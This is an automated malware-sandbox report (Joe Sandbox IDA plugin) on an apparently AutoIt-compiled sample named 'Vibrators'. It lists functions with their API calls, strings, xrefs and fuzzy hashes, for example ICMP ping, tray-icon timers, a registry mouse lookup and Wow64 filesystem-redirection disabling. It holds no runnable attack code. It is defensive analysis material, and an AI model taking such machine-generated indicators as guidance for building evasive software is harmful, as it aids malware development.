Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: d3b6ca70c0c1d132c36e14e61e693878e4a27943583a23492f59e55a9c2292ae
Instruction ID: af5bb253f60ecf545f1ce4af262679163010f41477a038756b8160dd829b0c15
Opcode Fuzzy Hash: d3b6ca70c0c1d132c36e14e61e693878e4a27943583a23492f59e55a9c2292ae
Instruction Fuzzy Hash: A9917F716042419FD720DF69C888F16BBE0AF44318F14C6ADF5699F6A2C771ED86CB81

Function 009F370F Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,009F3709,?,?), ref: 009F3777
KillTimer.USER32(?,00000001,?,?,?,?,?,009F3709,?,?), ref: 009F37A3
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 009F37C6
RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,009F3709,?,?), ref: 009F37D1
CreatePopupMenu.USER32 ref: 009F37E5
PostQuitMessage.USER32(00000000), ref: 009F3806

Strings

TaskbarCreated, xrefs: 009F37CC

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: 5ccd80b52fff8ef4396f5f982a88e5d266e9567a3577a918360222d502c5af8c
Instruction ID: 4fdf2b023cab269ad2dbd132f461b1918394eb9c0100103fa692ad7cb7d6e987
Opcode Fuzzy Hash: 5ccd80b52fff8ef4396f5f982a88e5d266e9567a3577a918360222d502c5af8c
Instruction Fuzzy Hash: 3741C3F510428CBBDF14BBB89D49F793AA9E744300F01C529FB02D9290DA7C9B458761

Function 00A290C5 Relevance: 13.8, APIs: 9, Instructions: 300
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f05d95f6dfe49d7a545caf32a52a4c91554538ddeb735794c72280c16d39ee4
Instruction ID: 1181935f1b5e0c61d37b8a12de04ab968a5dcd64717dcb6e31cbeeeac9dae924
Opcode Fuzzy Hash: 8f05d95f6dfe49d7a545caf32a52a4c91554538ddeb735794c72280c16d39ee4
Instruction Fuzzy Hash: 9AC1D470E042A9AFDF11DFECE941BAE7BB0AF09710F044169E424AB392C7309D42CB61

Function 00A0AC3E Relevance: 12.9, APIs: 1, Strings: 6, Instructions: 671
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

d1r0,2, xrefs: 00A0ACA9
d10m0, xrefs: 00A0ACF0
d0b, xrefs: 00A0AC96, 00A0AD10, 00A0AEA7
i, xrefs: 00A0B0A3
d1b, xrefs: 00A0AD55, 00A0AE8E
d5m0, xrefs: 00A0AE75

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID:
String ID: d0b$d10m0$d1b$d1r0,2$d5m0$i
API String ID: 0-4285391669
Opcode ID: 66159a80fd1d37d48e754cabd9dcb8659fc31971412047deab6c1bed9348a6a6
Instruction ID: 13694b9933445132afdfbcc0fa1829bbf879649aed52a316ae9884fed3cc6c44
Opcode Fuzzy Hash: 66159a80fd1d37d48e754cabd9dcb8659fc31971412047deab6c1bed9348a6a6
Instruction Fuzzy Hash: DD624674508345CFC728DF24D194AAABBE1BFC9308F10896EE5998B391DB70E945CF92

Function 009FF6D0 Relevance: 11.9, APIs: 2, Strings: 4, Instructions: 1414COMMON

Download Yara Rule

Strings

p6, xrefs: 009FFAED, 009FFBAC, 009FFBBA, 009FFBC8, 009FFBDC, 009FFF81, 009FFF89, 009FFFA2, 009FFFAD, 00A00027, 00A0002F, 00A00052, 00A0005D, 00A44660
Variable must be of type 'Object'., xrefs: 00A448C6
8K, xrefs: 009FF7E6, 009FF993, 009FFB22, 009FFBCE
PG, xrefs: 009FF7DC, 009FF989, 009FFB18, 009FFBC0

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID:
String ID: 8K$PG$Variable must be of type 'Object'.$p6
API String ID: 0-1937482542
Opcode ID: ab97595ce90f93c773b2f409b8dcd2f2b5e1b4c9abfbb60d784d098a92459b1b
Instruction ID: 6e152fb463b51af188a8e8c8203259e47e55e9aee1084392853e597fdc9c449a
Opcode Fuzzy Hash: ab97595ce90f93c773b2f409b8dcd2f2b5e1b4c9abfbb60d784d098a92459b1b
Instruction Fuzzy Hash: DAC29C75A00219DFCB24CF98D890BBDB7B5BF49310F248569EA05AB391E375ED81CB90

Function 00A00340 Relevance: 11.7, APIs: 3, Strings: 3, Instructions: 1236COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 00A015F2

Strings

p6, xrefs: 00A00972, 00A00A65, 00A00A74, 00A00A82, 00A00A96, 00A00B3F, 00A00B47, 00A00B5E, 00A00B6B, 00A00C2B, 00A00C33, 00A00C4A, 00A00C57, 00A46071
8K, xrefs: 00A0059F, 00A00771, 00A009A7, 00A00A88
PG, xrefs: 00A00595, 00A00767, 00A0099D, 00A00A7A

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Init_thread_footer
String ID: 8K$PG$p6
API String ID: 1385522511-3558827682
Opcode ID: 12dbbe3f560b1a6af7554ca66a11acfcc38a477455ec28bf3bfdebac559a4ca9
Instruction ID: 8b2a38ad0d5b6e3918745113d75de441e0408b19aa5cb29ebc97091dfe103003
Opcode Fuzzy Hash: 12dbbe3f560b1a6af7554ca66a11acfcc38a477455ec28bf3bfdebac559a4ca9
Instruction Fuzzy Hash: 2FB26975A08348CFCB24CF18E480B6AB7F1BB99304F14895DE9869B391D771ED85CB92

Function 009F35B3 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 009F35E1
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 009F3602
ShowWindow.USER32(00000000,?,?,?,?,?,?,009F3368,?), ref: 009F3616
ShowWindow.USER32(00000000,?,?,?,?,?,?,009F3368,?), ref: 009F361F

Strings

AutoIt v3, xrefs: 009F35D9, 009F35DE, 009F35DF
edit, xrefs: 009F35FC

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: b401f8d5866e2d5983bb4ac317d49dd2cf24746c03e84d0de377082b1e4146d7
Instruction ID: 1378669ee8c800f8f7bcc62ca51b02c3ed51377d10d40812315b5e514d4aba48
Opcode Fuzzy Hash: b401f8d5866e2d5983bb4ac317d49dd2cf24746c03e84d0de377082b1e4146d7
Instruction Fuzzy Hash: 51F03A746003D47AEB3197936C0CF372FBDE7C6F50B12002EB904AB2A0C2690842DBB0

Function 009F663E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,009F668B,?,?,009F62FA,?,00000001,?,?,00000000), ref: 009F664A
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 009F665C
FreeLibrary.KERNEL32(00000000,?,?,009F668B,?,?,009F62FA,?,00000001,?,?,00000000), ref: 009F666E

Strings

kernel32.dll, xrefs: 009F6642
Wow64DisableWow64FsRedirection, xrefs: 009F6656

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 145871493-3689287502
Opcode ID: 8f6e421f4d2c473209ed5ace0790855ca39a48d170622be143e85e148a5af2ba
Instruction ID: 2624bc5965f736fbaca821ab9294dc219b8092fdcffc1a20cb98e34ff4ca1956
Opcode Fuzzy Hash: 8f6e421f4d2c473209ed5ace0790855ca39a48d170622be143e85e148a5af2ba
Instruction Fuzzy Hash: 4CE01D356017227792212765BC0CB7E676C9F92F26B050315FD04D6194DF54CD0287F5

Function 009F2793 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 153
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 009F327E: MapVirtualKeyW.USER32(0000005B,00000000), ref: 009F32AF
Part of subcall function 009F327E: MapVirtualKeyW.USER32(00000010,00000000), ref: 009F32B7
Part of subcall function 009F327E: MapVirtualKeyW.USER32(000000A0,00000000), ref: 009F32C2
Part of subcall function 009F327E: MapVirtualKeyW.USER32(000000A1,00000000), ref: 009F32CD
Part of subcall function 009F327E: MapVirtualKeyW.USER32(00000011,00000000), ref: 009F32D5
Part of subcall function 009F327E: MapVirtualKeyW.USER32(00000012,00000000), ref: 009F32DD

Part of subcall function 009F3205: RegisterWindowMessageW.USER32(00000004,?,009F2964), ref: 009F325D

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 009F2A0A
OleInitialize.OLE32 ref: 009F2A28
CloseHandle.KERNEL32(00000000,00000000), ref: 00A33A0D

Strings

@, xrefs: 009F2857

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID: @
API String ID: 1986988660-2237638123
Opcode ID: 651fffe697641468ffa0197cc07e50cc8677f043f9921f5cc280b47e538d4679
Instruction ID: b50c0d1c143ec04fd0526b9f889f9bd6be3a1faafb2a550120e0873ba368f9b8
Opcode Fuzzy Hash: 651fffe697641468ffa0197cc07e50cc8677f043f9921f5cc280b47e538d4679
Instruction Fuzzy Hash: 61716CB09113098FD798EFA9EE65F663BE1FB88304752812ED119D73A1EB7844438F54

Function 009F61A9 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00A35287

Part of subcall function 009F8577: _wcslen.LIBCMT ref: 009F858A

Shell_NotifyIconW.SHELL32(00000001,?), ref: 009F6299

Strings

AutoIt - , xrefs: 009F620D
Line %d: , xrefs: 00A35305

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: IconLoadNotifyShell_String_wcslen
String ID: Line %d: $AutoIt -
API String ID: 2289894680-4094128768
Opcode ID: e58d1cadb98bea0c32385b4afc7045fe27ff04ce482dd61b9b560e8abfdd9458
Instruction ID: ebeada3015efb7a4cdf278fe710db0a432302103ff9bd638c0c375a5659e9010
Opcode Fuzzy Hash: e58d1cadb98bea0c32385b4afc7045fe27ff04ce482dd61b9b560e8abfdd9458
Instruction Fuzzy Hash: 0141A6714083086AC710EB64DC45FEF77ECAF94320F004A2EFA99961A2EF749649C792

Function 009F58CB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,009F58BE,SwapMouseButtons,00000004,?), ref: 009F58EF
RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,009F58BE,SwapMouseButtons,00000004,?), ref: 009F5910
RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,009F58BE,SwapMouseButtons,00000004,?), ref: 009F5932

Strings

Control Panel\Mouse, xrefs: 009F58ED

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: ab013d1dce8bc6cf61826ca38fba6a121564e6df9d53a16a6b53c371b544e8cd
Instruction ID: 9466401030768601ced3d3a76e685cd62283a45ce8679482378e0dadf609d415
Opcode Fuzzy Hash: ab013d1dce8bc6cf61826ca38fba6a121564e6df9d53a16a6b53c371b544e8cd
Instruction Fuzzy Hash: 51115A75510618FFDB258FA4CC80DBE77BCEF00760B518419EA42E7210E2719E819B60

Function 00A1014B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 00A109D8

Part of subcall function 00A13614: RaiseException.KERNEL32(?,?,?,00A109FA,?,00000000,?,?,?,?,?,?,00A109FA,00000000,00AB9758,00000000), ref: 00A13674

__CxxThrowException@8.LIBVCRUNTIME ref: 00A109F5

Strings

Unknown exception, xrefs: 00A10A02

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: Unknown exception
API String ID: 3476068407-410509341
Opcode ID: 94c68e8ca7ce83fccf978b1c0fad94d6f0d4d712c48e3a49973d361ea19b7a4b
Instruction ID: ca7d08028fd482448b5342cec614c51283c8cbfd8eb680a52c55beabb0fb0e67
Opcode Fuzzy Hash: 94c68e8ca7ce83fccf978b1c0fad94d6f0d4d712c48e3a49973d361ea19b7a4b
Instruction Fuzzy Hash: C1F0C235D0020CB78F00BBA4ED56CDE77BC5E01350BA04120BA24E6592FBB0EAD6C6D0

Function 00A789B6 Relevance: 4.9, APIs: 3, Instructions: 430COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00A78D52
TerminateProcess.KERNEL32(00000000), ref: 00A78D59
FreeLibrary.KERNEL32(?,?,?,?), ref: 00A78F3A

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Process$CurrentFreeLibraryTerminate
String ID:
API String ID: 146820519-0
Opcode ID: caf8f2cf3a7e081819fd84d1853d8dcba014d57e2a7ecdc164ac6194a10bc499
Instruction ID: 3132555dad9fc38e24e2bada6d66a3b743823d79a417b89a723889ba2dd1eba4
Opcode Fuzzy Hash: caf8f2cf3a7e081819fd84d1853d8dcba014d57e2a7ecdc164ac6194a10bc499
Instruction Fuzzy Hash: 32126B71A083419FC714DF28C884B6ABBE5FF84314F14C95DE9898B292CB35ED45CB92

Function 00A0FCAD Relevance: 4.6, APIs: 3, Instructions: 75timewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 009F61A9: Shell_NotifyIconW.SHELL32(00000001,?), ref: 009F6299

KillTimer.USER32(?,00000001,?,?), ref: 00A0FD36
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00A0FD45
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00A4FE33

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: IconNotifyShell_Timer$Kill
String ID:
API String ID: 3500052701-0
Opcode ID: 53f04d51caec76c673b1845b6b134b644f634abc5c87de4a47c18a9f6193a26e
Instruction ID: 87cfdc1a27fe97db1d78489579321177112766ad05c4d64c31f22d5c1ca4e5c0
Opcode Fuzzy Hash: 53f04d51caec76c673b1845b6b134b644f634abc5c87de4a47c18a9f6193a26e
Instruction Fuzzy Hash: 9F31D575904344AFEB32CF24C845BE7BBFCAB42308F0014AED6DA97282D3745A85CB51

Function 00A28A2E Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,00000000,?,?,00A2894C,?,00AB9CE8,0000000C), ref: 00A28A84
GetLastError.KERNEL32(?,00A2894C,?,00AB9CE8,0000000C), ref: 00A28A8E
__dosmaperr.LIBCMT ref: 00A28AB9

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: CloseErrorHandleLast__dosmaperr
String ID:
API String ID: 2583163307-0
Opcode ID: f9a8024f1f25a10f700946e8bdc68c7cd207e5cf93300ff80e9c446af544c0f1
Instruction ID: 9049a6df4f673935af111d067599bd6c500348f652eab0358e17d43c497a43f6
Opcode Fuzzy Hash: f9a8024f1f25a10f700946e8bdc68c7cd207e5cf93300ff80e9c446af544c0f1
Instruction Fuzzy Hash: 66012B32A071706AD624637CBD45B7E67455F827B4F2B053BF8149B1D2DF388D814290

Function 00A2970B Relevance: 4.6, APIs: 3, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,00A297BA,FF8BC369,00000000,00000002,00000000), ref: 00A29744
GetLastError.KERNEL32(?,00A297BA,FF8BC369,00000000,00000002,00000000,?,00A25ED4,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,00A16F41), ref: 00A2974E
__dosmaperr.LIBCMT ref: 00A29755

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: ErrorFileLastPointer__dosmaperr
String ID:
API String ID: 2336955059-0
Opcode ID: d1cd2fa2b6d0659a6016831b25d87d598ace2c4c1fa3561c1c5aaddbbc213f38
Instruction ID: e1fd980429940182c367411c3b4dccda29353fd92582616d8588dff43c8cb121
Opcode Fuzzy Hash: d1cd2fa2b6d0659a6016831b25d87d598ace2c4c1fa3561c1c5aaddbbc213f38
Instruction Fuzzy Hash: 0801D832620564AFCB159FADEC05CAF7B29EF85730F240269F8219B190EA719D519B90

Function 009FF238 Relevance: 4.5, APIs: 3, Instructions: 29windowsleepCOMMON

Download Yara Rule

APIs

TranslateMessage.USER32(?), ref: 009FF27B
DispatchMessageW.USER32(?), ref: 009FF289
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 009FF29F
Sleep.KERNEL32(0000000A), ref: 009FF2B1
TranslateAcceleratorW.USER32(?,?,?), ref: 00A432D8

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Message$Translate$AcceleratorDispatchPeekSleep
String ID:
API String ID: 3288985973-0
Opcode ID: 5a964c93cc86075c191f8bd12d0ed3baa276da0119f83a41151f124d6a8a8ec3
